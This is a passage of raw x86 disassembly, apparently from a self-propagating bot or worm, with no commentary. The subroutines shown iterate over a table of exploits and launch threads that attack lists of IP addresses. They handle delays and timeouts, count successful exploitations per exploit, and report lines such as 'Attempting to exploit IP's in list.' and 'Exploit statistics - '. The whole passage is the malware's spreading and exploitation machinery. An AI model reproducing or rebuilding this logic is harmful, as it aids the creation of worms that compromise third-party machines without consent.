call [ebp+var_11A]
cmp [ebp+var_8A], 1
jnz short loc_41346F
push [ebp+var_10E]
push [ebp+var_14C]
call sub_412A3A
pop ecx
pop ecx
jmp short loc_41348A
; ---------------------------------------------------------------------------
loc_41346F: ; CODE XREF: sub_41331E+13A�j
cmp [ebp+var_8A], 2
jnz short loc_41348A
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_86]
push eax
call sub_412BC9
pop ecx
pop ecx
loc_41348A: ; CODE XREF: sub_41331E+14F�j
; sub_41331E+158�j
push [ebp+var_10E]
call sub_4053B1
pop ecx
xor eax, eax
locret_413498: ; CODE XREF: sub_41331E+5E�j
; sub_41331E+8E�j
leave
retn 4
sub_41331E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41349C proc near ; DATA XREF: sub_413AB0+1F4�o
var_774 = qword ptr -774h
var_764 = qword ptr -764h
var_75C = byte ptr -75Ch
var_65C = byte ptr -65Ch
var_658 = dword ptr -658h
var_654 = dword ptr -654h
var_650 = dword ptr -650h
var_64C = byte ptr -64Ch
var_648 = byte ptr -648h
var_644 = dword ptr -644h
var_640 = byte ptr -640h
var_62C = dword ptr -62Ch
var_628 = dword ptr -628h
var_624 = byte ptr -624h
var_51C = byte ptr -51Ch
var_50E = dword ptr -50Eh
var_50A = dword ptr -50Ah
var_506 = dword ptr -506h
var_502 = byte ptr -502h
var_37B = byte ptr -37Bh
var_37A = byte ptr -37Ah
var_377 = byte ptr -377h
var_36B = byte ptr -36Bh
var_36A = byte ptr -36Ah
var_35C = dword ptr -35Ch
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_341 = byte ptr -341h
var_296 = dword ptr -296h
var_20C = byte ptr -20Ch
var_20B = byte ptr -20Bh
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 764h
push edi
push 2C9h
push [ebp+arg_0]
lea eax, [ebp+var_628]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_51C]
push eax
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_4134F5
push 14Ch
push 0
lea eax, [ebp+var_358]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4135BF
; ---------------------------------------------------------------------------
loc_4134F5: ; CODE XREF: sub_41349C+3C�j
and [ebp+var_62C], 0
jmp short loc_41350B
; ---------------------------------------------------------------------------
loc_4134FE: ; CODE XREF: sub_41349C:loc_4135BA�j
mov eax, [ebp+var_62C]
inc eax
mov [ebp+var_62C], eax
loc_41350B: ; CODE XREF: sub_41349C+60�j
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CCD0
push eax
lea eax, [ebp+var_640]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_640]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_640]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4135BA
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CCD0
mov [ebp+var_358], eax
push 3Ah
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CCD0
push eax
lea eax, [ebp+var_354]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_354]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_341]
push eax
call sub_4105FB
pop ecx
and [ebp+var_296], 0
lea eax, [ebp+var_341]
push eax
lea eax, [ebp+var_51C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_4135BF
; ---------------------------------------------------------------------------
loc_4135BA: ; CODE XREF: sub_41349C+B0�j
jmp loc_4134FE
; ---------------------------------------------------------------------------
loc_4135BF: ; CODE XREF: sub_41349C+54�j
; sub_41349C+11C�j
lea eax, [ebp+var_624]
push eax
call sub_40806A
pop ecx
test eax, eax
jnz short loc_4135E3
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_4135E3: ; CODE XREF: sub_41349C+132�j
mov al, byte_41DE30
mov [ebp+var_20C], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_20B]
rep stosd
stosw
stosb
mov al, byte_41DE30
mov [ebp+var_108], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_107]
rep stosd
stosw
stosb
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_624]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_407F3D
add esp, 0Ch
test eax, eax
jnz short loc_41364D
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_41364D: ; CODE XREF: sub_41349C+19C�j
push [ebp+var_506]
call sub_404D10
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413675
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_413675: ; CODE XREF: sub_41349C+1C4�j
cmp [ebp+var_358], 0
jz loc_413782
mov eax, [ebp+var_358]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413782
call sub_4042FB
mov [ebp+var_644], eax
cmp [ebp+var_644], 0
jz short loc_4136B6
mov [ebp+var_296], 2
jmp short loc_4136C0
; ---------------------------------------------------------------------------
loc_4136B6: ; CODE XREF: sub_41349C+20C�j
mov [ebp+var_296], 3
loc_4136C0: ; CODE XREF: sub_41349C+218�j
movsx eax, [ebp+var_36B]
test eax, eax
jz short loc_4136E5
mov eax, [ebp+var_358]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_4136E5
mov [ebp+var_296], 1
loc_4136E5: ; CODE XREF: sub_41349C+22D�j
; sub_41349C+23D�j
movsx eax, [ebp+var_37B]
test eax, eax
jz short loc_4136FA
mov [ebp+var_296], 2
loc_4136FA: ; CODE XREF: sub_41349C+252�j
movsx eax, [ebp+var_37A]
test eax, eax
jz short loc_41370F
mov [ebp+var_296], 3
loc_41370F: ; CODE XREF: sub_41349C+267�j
cmp [ebp+var_296], 3
jnz short loc_41372B
cmp [ebp+var_644], 0
jz short loc_41372B
mov [ebp+var_296], 2
loc_41372B: ; CODE XREF: sub_41349C+27A�j
; sub_41349C+283�j
cmp [ebp+var_296], 3
jnz short loc_413782
mov al, [ebp+var_36A]
mov [ebp+var_64C], al
mov al, [ebp+var_377]
mov [ebp+var_648], al
mov [ebp+var_36A], 1
and [ebp+var_377], 0
push 0
lea eax, [ebp+var_502]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp+var_64C]
mov [ebp+var_36A], al
mov al, [ebp+var_648]
mov [ebp+var_377], al
loc_413782: ; CODE XREF: sub_41349C+1E0�j
; sub_41349C+1F4�j ...
push offset dword_41E2D8
call sub_409C6C
pop ecx
push [ebp+var_50E]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
push offset dword_41CE78
mov eax, [ebp+var_628]
add eax, 14h
push eax
call sub_416B5E ; sprintf
add esp, 14h
push offset dword_41E2D8
call sub_409C7A
pop ecx
push [ebp+var_50E]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
mov eax, [ebp+var_628]
push dword ptr [eax]
push offset dword_41CE40
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 18h
cmp [ebp+var_358], 0
jnz short loc_413807
push 3E8h
call dword_41709C ; Sleep
loc_413807: ; CODE XREF: sub_41349C+35E�j
and [ebp+var_10C], 0
call sub_416B64 ; clock
mov [ebp+var_35C], eax
and [ebp+var_4], 0
loc_41381D: ; CODE XREF: sub_41349C+3F9�j
; sub_41349C+44B�j ...
mov eax, [ebp+var_628]
cmp dword ptr [eax+4], 0
jnz short loc_413847
call sub_416B64 ; clock
add eax, [ebp+var_4]
sub eax, [ebp+var_35C]
mov ecx, [ebp+var_50E]
imul ecx, 3E8h
cmp eax, ecx
jb short loc_41384C
loc_413847: ; CODE XREF: sub_41349C+38B�j
jmp loc_413A43
; ---------------------------------------------------------------------------
loc_41384C: ; CODE XREF: sub_41349C+3A9�j
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_624]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_407F3D
add esp, 0Ch
push offset dword_41EF48
lea eax, [ebp+var_20C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_413897
jmp short loc_41381D
; ---------------------------------------------------------------------------
loc_413897: ; CODE XREF: sub_41349C+3F7�j
push [ebp+var_8]
push 0
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp+var_650], eax
cmp [ebp+var_650], 0
jz short loc_4138EC
call sub_416B64 ; clock
add eax, [ebp+var_4]
sub eax, [ebp+var_35C]
mov ecx, [ebp+var_50E]
imul ecx, 3E8h
cmp eax, ecx
jnb short loc_4138EC
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_4138EC: ; CODE XREF: sub_41349C+42B�j
; sub_41349C+449�j
push [ebp+var_50A]
call dword_41709C ; Sleep
push [ebp+var_8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_413A35
loc_413909: ; CODE XREF: sub_41349C+4BA�j
; sub_41349C:loc_413A30�j
push [ebp+var_8]
call sub_404F24
pop ecx
mov [ebp+var_654], eax
cmp [ebp+var_654], 0
jnz short loc_413926
jmp loc_413A35
; ---------------------------------------------------------------------------
loc_413926: ; CODE XREF: sub_41349C+483�j
mov eax, [ebp+var_10C]
inc eax
mov [ebp+var_10C], eax
cmp [ebp+var_358], 0
jz short loc_4139B7
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_658], eax
cmp [ebp+var_658], 0
jnz short loc_413958
jmp short loc_413909
; ---------------------------------------------------------------------------
loc_413958: ; CODE XREF: sub_41349C+4B8�j
push 14Ch
lea eax, [ebp+var_358]
push eax
push [ebp+var_658]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_658]
mov ecx, [ebp+var_654]
mov [eax+3Eh], ecx
push [ebp+var_658]
push offset sub_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4139A5
push [ebp+var_658]
call sub_416B4C ; free
pop ecx
jmp short loc_4139B5
; ---------------------------------------------------------------------------
loc_4139A5: ; CODE XREF: sub_41349C+4F9�j
push [ebp+var_8]
push [ebp+var_654]
call sub_404D9B
pop ecx
pop ecx
loc_4139B5: ; CODE XREF: sub_41349C+507�j
jmp short loc_413A30
; ---------------------------------------------------------------------------
loc_4139B7: ; CODE XREF: sub_41349C+49E�j
mov eax, [ebp+var_628]
cmp dword ptr [eax+4], 0
jz short loc_4139C5
jmp short loc_413A35
; ---------------------------------------------------------------------------
loc_4139C5: ; CODE XREF: sub_41349C+525�j
lea eax, [ebp+var_75C]
push eax
push [ebp+var_654]
call sub_4044F7
pop ecx
pop ecx
mov al, [ebp+var_36A]
mov [ebp+var_65C], al
and [ebp+var_36A], 0
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_75C]
push eax
push offset dword_41CE2C
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp+var_65C]
mov [ebp+var_36A], al
push 3E8h
call dword_41709C ; Sleep
mov eax, [ebp+var_4]
add eax, 3E8h
mov [ebp+var_4], eax
loc_413A30: ; CODE XREF: sub_41349C:loc_4139B5�j
jmp loc_413909
; ---------------------------------------------------------------------------
loc_413A35: ; CODE XREF: sub_41349C+467�j
; sub_41349C+485�j ...
push [ebp+var_8]
call sub_404F7D
pop ecx
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_413A43: ; CODE XREF: sub_41349C:loc_413847�j
push [ebp+var_10C]
call sub_416B64 ; clock
sub eax, [ebp+var_35C]
mov dword ptr [ebp+var_764], eax
and dword ptr [ebp+var_764+4], 0
fild [ebp+var_764]
fdiv flt_417270
push ecx
push ecx
fstp [esp+774h+var_774]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
push offset unk_41CDE8
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 1Ch
push [ebp+var_8]
call sub_404FD0
pop ecx
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
loc_413AAB: ; CODE XREF: sub_41349C+142�j
; sub_41349C+1AC�j ...
pop edi
leave
retn 4
sub_41349C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413AB0 proc near ; CODE XREF: sub_40A9CF+BCB�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
cmp [ebp+arg_4], 0
jz short loc_413AC2
cmp [ebp+arg_8], 0
jnz short loc_413AC7
loc_413AC2: ; CODE XREF: sub_413AB0+A�j
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AC7: ; CODE XREF: sub_413AB0+10�j
push [ebp+arg_8]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_413AEB
push [ebp+arg_8]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_413AE9
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AE9: ; CODE XREF: sub_413AB0+32�j
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413AEB: ; CODE XREF: sub_413AB0+25�j
and [ebp+var_14], 0
jmp short loc_413AF8
; ---------------------------------------------------------------------------
loc_413AF1: ; CODE XREF: sub_413AB0:loc_413B43�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_413AF8: ; CODE XREF: sub_413AB0+3F�j
mov eax, [ebp+var_14]
imul eax, 3Ah
movsx eax, byte_41CCD0[eax]
test eax, eax
jnz short loc_413B0E
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413B0E: ; CODE XREF: sub_413AB0+57�j
mov eax, [ebp+var_14]
imul eax, 3Ah
add eax, offset byte_41CCD0
push eax
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_28]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_413B43
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413B43: ; CODE XREF: sub_413AB0+8F�j
jmp short loc_413AF1
; ---------------------------------------------------------------------------
loc_413B45: ; CODE XREF: sub_413AB0:loc_413AE9�j
; sub_413AB0+91�j
cmp [ebp+arg_C], 0
jz short loc_413B59
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_2C], eax
jmp short loc_413B60
; ---------------------------------------------------------------------------
loc_413B59: ; CODE XREF: sub_413AB0+99�j
mov [ebp+var_2C], 15180h
loc_413B60: ; CODE XREF: sub_413AB0+A7�j
mov eax, [ebp+var_2C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_413B75
cmp [ebp+var_4], 15180h
jbe short loc_413B7C
loc_413B75: ; CODE XREF: sub_413AB0+BA�j
mov [ebp+var_4], 15180h
loc_413B7C: ; CODE XREF: sub_413AB0+C3�j
cmp [ebp+arg_10], 0
jz short loc_413B90
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_30], eax
jmp short loc_413B97
; ---------------------------------------------------------------------------
loc_413B90: ; CODE XREF: sub_413AB0+D0�j
mov [ebp+var_30], 7D0h
loc_413B97: ; CODE XREF: sub_413AB0+DE�j
mov eax, [ebp+var_30]
mov [ebp+var_C], eax
cmp [ebp+var_C], 32h
jb short loc_413BAC
cmp [ebp+var_C], 0EA60h
jbe short loc_413BB3
loc_413BAC: ; CODE XREF: sub_413AB0+F1�j
mov [ebp+var_C], 7D0h
loc_413BB3: ; CODE XREF: sub_413AB0+FA�j
cmp [ebp+arg_14], 0
jz short loc_413BC7
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_34], eax
jmp short loc_413BCE
; ---------------------------------------------------------------------------
loc_413BC7: ; CODE XREF: sub_413AB0+107�j
mov [ebp+var_34], 100h
loc_413BCE: ; CODE XREF: sub_413AB0+115�j
mov eax, [ebp+var_34]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_413BE3
cmp [ebp+var_10], 200h
jbe short loc_413BEA
loc_413BE3: ; CODE XREF: sub_413AB0+128�j
mov [ebp+var_10], 100h
loc_413BEA: ; CODE XREF: sub_413AB0+131�j
push 2C9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413C03
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413C03: ; CODE XREF: sub_413AB0+14C�j
push 108h
push [ebp+arg_4]
mov eax, [ebp+var_8]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 0Eh
push [ebp+arg_8]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov [eax+11Ah], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov [eax+11Eh], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_10]
mov [eax+122h], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 126h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_10]
push [ebp+var_C]
mov eax, [ebp+var_8]
push dword ptr [eax+11Ah]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
mov eax, [ebp+var_8]
add eax, 4
push eax
push offset unk_41CEA4
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset sub_41349C
call sub_4095A4
add esp, 24h
locret_413CB1: ; CODE XREF: sub_413AB0:loc_413AC2�j
; sub_413AB0+34�j ...
leave
retn
sub_413AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413CB3 proc near ; DATA XREF: sub_413FE7+5C�o
var_49C = dword ptr -49Ch
var_498 = byte ptr -498h
var_494 = byte ptr -494h
var_490 = dword ptr -490h
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_469 = byte ptr -469h
var_3BE = dword ptr -3BEh
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = byte ptr -32Ch
var_1AC = byte ptr -1ACh
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_21 = byte ptr -21h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_330]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov eax, [ebp+var_330]
push dword ptr [eax]
push offset unk_41CF50
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 0Ch
and [ebp+var_334], 0
and [ebp+var_484], 0
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
lea eax, [ebp+var_32C]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_8], eax
loc_413D21: ; CODE XREF: sub_413CB3:loc_413FA8�j
mov eax, [ebp+var_334]
inc eax
mov [ebp+var_334], eax
and [ebp+var_488], 0
jmp short loc_413D44
; ---------------------------------------------------------------------------
loc_413D37: ; CODE XREF: sub_413CB3+23B�j
; sub_413CB3:loc_413F77�j
mov eax, [ebp+var_488]
inc eax
mov [ebp+var_488], eax
loc_413D44: ; CODE XREF: sub_413CB3+82�j
mov eax, [ebp+var_488]
imul eax, 3Ah
cmp off_41CCFE[eax], 0
jz loc_413F7C
push 3Ah
mov eax, [ebp+var_488]
imul eax, 3Ah
add eax, offset byte_41CCD0
push eax
lea eax, [ebp+var_47C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_488]
imul eax, 3Ah
add eax, offset byte_41CCD0
mov [ebp+var_480], eax
lea eax, [ebp+var_47C]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_469]
push eax
call sub_4105FB
pop ecx
cmp [ebp+var_480], 0
jz loc_413E9A
mov eax, [ebp+var_480]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413E9A
call sub_4042FB
mov [ebp+var_490], eax
cmp [ebp+var_490], 0
jz short loc_413DE9
mov [ebp+var_3BE], 2
jmp short loc_413DF3
; ---------------------------------------------------------------------------
loc_413DE9: ; CODE XREF: sub_413CB3+128�j
mov [ebp+var_3BE], 3
loc_413DF3: ; CODE XREF: sub_413CB3+134�j
movsx eax, [ebp+var_15]
test eax, eax
jz short loc_413E15
mov eax, [ebp+var_480]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_413E15
mov [ebp+var_3BE], 1
loc_413E15: ; CODE XREF: sub_413CB3+146�j
; sub_413CB3+156�j
movsx eax, [ebp+var_25]
test eax, eax
jz short loc_413E27
mov [ebp+var_3BE], 2
loc_413E27: ; CODE XREF: sub_413CB3+168�j
movsx eax, [ebp+var_24]
test eax, eax
jz short loc_413E39
mov [ebp+var_3BE], 3
loc_413E39: ; CODE XREF: sub_413CB3+17A�j
cmp [ebp+var_3BE], 3
jnz short loc_413E55
cmp [ebp+var_490], 0
jz short loc_413E55
mov [ebp+var_3BE], 2
loc_413E55: ; CODE XREF: sub_413CB3+18D�j
; sub_413CB3+196�j
cmp [ebp+var_3BE], 3
jnz short loc_413E9A
mov al, [ebp+var_14]
mov [ebp+var_498], al
mov al, [ebp+var_21]
mov [ebp+var_494], al
mov [ebp+var_14], 1
and [ebp+var_21], 0
push 0
lea eax, [ebp+var_1AC]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp+var_498]
mov [ebp+var_14], al
mov al, [ebp+var_494]
mov [ebp+var_21], al
loc_413E9A: ; CODE XREF: sub_413CB3+FC�j
; sub_413CB3+110�j ...
movsx eax, [ebp+var_13]
neg eax
sbb eax, eax
and eax, 1388h
add eax, 1388h
push eax
push 0
lea eax, [ebp+var_469]
push eax
push [ebp+var_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_48C], eax
cmp [ebp+var_48C], 0
jz loc_413F77
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_49C], eax
cmp [ebp+var_49C], 0
jnz short loc_413EF3
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413EF3: ; CODE XREF: sub_413CB3+239�j
push 14Ch
lea eax, [ebp+var_480]
push eax
push [ebp+var_49C]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_484]
inc eax
mov [ebp+var_484], eax
mov eax, [ebp+var_49C]
mov ecx, [ebp+var_48C]
mov [eax+3Eh], ecx
push [ebp+var_49C]
push offset sub_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_413F59
push [ebp+var_48C]
call sub_4053B1
pop ecx
push [ebp+var_49C]
call sub_416B4C ; free
pop ecx
jmp short loc_413F77
; ---------------------------------------------------------------------------
loc_413F59: ; CODE XREF: sub_413CB3+28A�j
lea eax, [ebp+var_47C]
push eax
push [ebp+var_8]
push offset dword_41CF20
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 10h
loc_413F77: ; CODE XREF: sub_413CB3+21B�j
; sub_413CB3+2A4�j
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413F7C: ; CODE XREF: sub_413CB3+A1�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413F9A
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413F9A: ; CODE XREF: sub_413CB3+2E3�j
mov eax, [ebp+var_330]
cmp dword ptr [eax+4], 0
jz short loc_413FA8
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413FA8: ; CODE XREF: sub_413CB3+2F1�j
jmp loc_413D21
; ---------------------------------------------------------------------------
loc_413FAD: ; CODE XREF: sub_413CB3+2E5�j
; sub_413CB3+2F3�j
push [ebp+var_334]
push [ebp+var_484]
mov eax, [ebp+var_330]
push dword ptr [eax]
push offset dword_41CEDC
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 14h
push [ebp+var_330]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_413CB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413FE7 proc near ; CODE XREF: sub_40A9CF+B5B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_413FF3
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_413FF3: ; CODE XREF: sub_413FE7+8�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414009
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_414009: ; CODE XREF: sub_413FE7+1E�j
push 180h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset aAttemptingToEx ; "Attempting to exploit IP's in list."
push 0
push [ebp+var_4]
push offset sub_413CB3
call sub_4095A4
add esp, 10h
locret_414050: ; CODE XREF: sub_413FE7+A�j
; sub_413FE7+20�j
leave
retn
sub_413FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414052 proc near ; DATA XREF: sub_41417D+35�o
var_3C0 = dword ptr -3C0h
var_3BC = byte ptr -3BCh
var_225 = byte ptr -225h
var_224 = byte ptr -224h
var_218 = byte ptr -218h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3C0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_3C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push offset aExploitStatist ; "Exploit statistics - "
lea eax, [ebp+var_200]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
and [ebp+var_204], 0
jmp short loc_4140A4
; ---------------------------------------------------------------------------
loc_414097: ; CODE XREF: sub_414052:loc_41414A�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
loc_4140A4: ; CODE XREF: sub_414052+43�j
mov eax, [ebp+var_204]
imul eax, 3Ah
movsx eax, byte_41CCD0[eax]
test eax, eax
jz loc_41414F
push 12h
mov eax, [ebp+var_204]
imul eax, 3Ah
add eax, offset byte_41CCD0
push eax
lea eax, [ebp+var_218]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_218]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_200]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_204]
imul eax, 3Ah
push dword_41CCFA[eax]
push offset dword_41CFA4
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
lea eax, [ebp+eax+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
movsx eax, [ebp+var_225]
test eax, eax
jz short loc_41414A
mov eax, [ebp+var_204]
imul eax, 3Ah
and dword_41CCFA[eax], 0
loc_41414A: ; CODE XREF: sub_414052+E6�j
jmp loc_414097
; ---------------------------------------------------------------------------
loc_41414F: ; CODE XREF: sub_414052+64�j
and [ebp+var_224], 0
lea eax, [ebp+var_200]
push eax
lea eax, [ebp+var_3BC]
push eax
call sub_40D53F
pop ecx
pop ecx
push [ebp+var_3C0]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_414052 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41417D proc near ; CODE XREF: sub_40A9CF+BF4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414197
jmp short locret_4141BF
; ---------------------------------------------------------------------------
loc_414197: ; CODE XREF: sub_41417D+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingExploit ; "Listing exploit statistics"
push 0
push [ebp+var_4]
push offset sub_414052
call sub_4095A4
add esp, 10h
locret_4141BF: ; CODE XREF: sub_41417D+18�j
leave
retn
sub_41417D endp
; =============== S U B R O U T I N E =======================================
